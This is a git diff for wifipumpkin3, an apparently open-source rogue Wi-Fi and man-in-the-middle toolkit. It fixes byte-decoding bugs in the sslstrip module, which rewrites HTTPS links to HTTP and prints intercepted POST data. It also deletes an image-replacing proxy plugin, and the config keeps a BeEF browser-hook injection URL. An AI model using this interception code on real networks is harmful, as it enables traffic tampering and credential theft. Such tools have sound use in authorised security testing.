diff --git a/config/app/pumpkinproxy.ini b/config/app/pumpkinproxy.ini index 560f83c6..ad3d33cd 100644 --- a/config/app/pumpkinproxy.ini +++ b/config/app/pumpkinproxy.ini @@ -3,15 +3,11 @@ downloadspoof=false js_inject=false html_inject=false beef=false -replaceImages=false no-cache=false [set_js_inject] url=http://example.com/foo.js -[set_replaceImages] -path=docs/logo.png - [set_beef] url_hook=http://172.16.149.141:3000/hook.js diff --git a/wifipumpkin3/core/wirelessmode/restapi.py b/wifipumpkin3/core/wirelessmode/restapi.py index 8c67963d..839809b2 100644 --- a/wifipumpkin3/core/wirelessmode/restapi.py +++ b/wifipumpkin3/core/wirelessmode/restapi.py @@ -190,10 +190,10 @@ def Configure(self): % (self.DHCP["subnet"], self.DHCP["netmask"], self.DHCP["router"]), ], "kill": [ - "iptables -w --flush", - "iptables -w --table nat --flush", - "iptables -w --delete-chain", - "iptables -w --table nat --delete-chain", + "{} -w --flush".format(self.getIptablesPath), + "{} -w --table nat --flush".format(self.getIptablesPath), + "{} -w --delete-chain".format(self.getIptablesPath), + "{} -w --table nat --delete-chain".format(self.getIptablesPath), "killall dhpcd 2>/dev/null", "ifconfig {} down".format(self.ifaceHostapd), "ifconfig {} up".format(self.ifaceHostapd), diff --git a/wifipumpkin3/plugins/bin/sslstrip3.py b/wifipumpkin3/plugins/bin/sslstrip3.py index 92c625c9..ad123a0a 100644 --- a/wifipumpkin3/plugins/bin/sslstrip3.py +++ b/wifipumpkin3/plugins/bin/sslstrip3.py @@ -161,6 +161,7 @@ def init(argv): all_plugins = base.BasePumpkin.__subclasses__() for p in all_plugins: if config.get("plugins", p.getName(), format=bool): + print("plugin: {} [enabled]".format(p.getName())) plugins_manager.plugins = p reactor.run() diff --git a/wifipumpkin3/plugins/external/sslstrip/ServerConnection.py b/wifipumpkin3/plugins/external/sslstrip/ServerConnection.py index a306b396..e978fa91 100644 --- a/wifipumpkin3/plugins/external/sslstrip/ServerConnection.py +++ b/wifipumpkin3/plugins/external/sslstrip/ServerConnection.py @@ -81,9 +81,9 @@ def sendPostData(self): print( self.getPostPrefix() + " Data (" - + self.headers["host"] + + self.headers.get("host") if self.headers.get("host") else ' ' + "):\n" - + str(self.postData) + + str(self.postData) if self.postData else '' ) self.transport.write(self.postData) @@ -92,7 +92,7 @@ def connectionMade(self): self.sendRequest() self.sendHeaders() - if self.command == "POST": + if self.command.decode() == "POST": self.sendPostData() def handleStatus(self, version, code, message): @@ -113,15 +113,15 @@ def handleHeader(self, key, value): pass if key.decode().lower() == "content-encoding": - if value.decode().find("gzip") != -1: + if "gzip" in value.decode(): self.isCompressed = True - if key.lower() == "location": + if key.decode().lower() == "location": value = self.replaceSecureLinks(value) self.urlMonitor.addRedirection(self.client.uri, value) - if key.lower() == "content-type": - if value.find("image") != -1: + if key.decode().lower() == "content-type": + if "image" in value.decode(): self.isImageRequest = True print("Response is image content, not scanning...") @@ -185,7 +185,7 @@ def handleResponse(self, data): self.shutdown() def replaceSecureLinks(self, data): - iterator = re.finditer(ServerConnection.urlExpression, data) + iterator = re.finditer(ServerConnection.urlExpression, data.decode()) for match in iterator: url = match.group() @@ -196,7 +196,7 @@ def replaceSecureLinks(self, data): url = url.replace("&", "&") self.urlMonitor.addSecureLink(self.client.getClientIP(), url) - data = re.sub(ServerConnection.urlExplicitPort, r"http://\1/", data) + data = re.sub(ServerConnection.urlExplicitPort, r"http://\1/", data.decode()) return re.sub(ServerConnection.urlType, "http://", data) def shutdown(self): diff --git a/wifipumpkin3/plugins/pumpkinproxy/replace_image.py b/wifipumpkin3/plugins/pumpkinproxy/replace_image.py deleted file mode 100644 index 33413c07..00000000 --- a/wifipumpkin3/plugins/pumpkinproxy/replace_image.py +++ /dev/null @@ -1,53 +0,0 @@ -from wifipumpkin3.plugins.pumpkinproxy.base import BasePumpkin -from os import path -from io import StringIO - -# This file is part of the wifipumpkin3 Open Source Project. -# wifipumpkin3 is licensed under the Apache 2.0. - -# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f) - -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at - -# http://www.apache.org/licenses/LICENSE-2.0 - -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - - -class replaceImages(BasePumpkin): - meta = { - "_name": "replaceImages", - "_version": "1.0", - "_description": "this module proxy replace all images with the picture .", - "_author": "mh4x0f", - } - - @staticmethod - def getName(): - return replaceImages.meta["_name"] - - def __init__(self): - for key, value in self.meta.items(): - self.__dict__[key] = value - self.ConfigParser = True - self.imagePath = self._config.get("set_replaceImages", "path") - - def handleResponse(self, request, data): - self.content = request.responseHeaders.getRawHeaders("content-type") - if str(self.content).startswith("image"): - if path.isfile(self.imagePath): - try: - img = StringIO(open(self.imagePath, "rb").read().decode()) - data = img.getvalue() - print( - "[{}] URL:{} image replaced...".format(self._name, request.uri) - ) - except: - pass - return data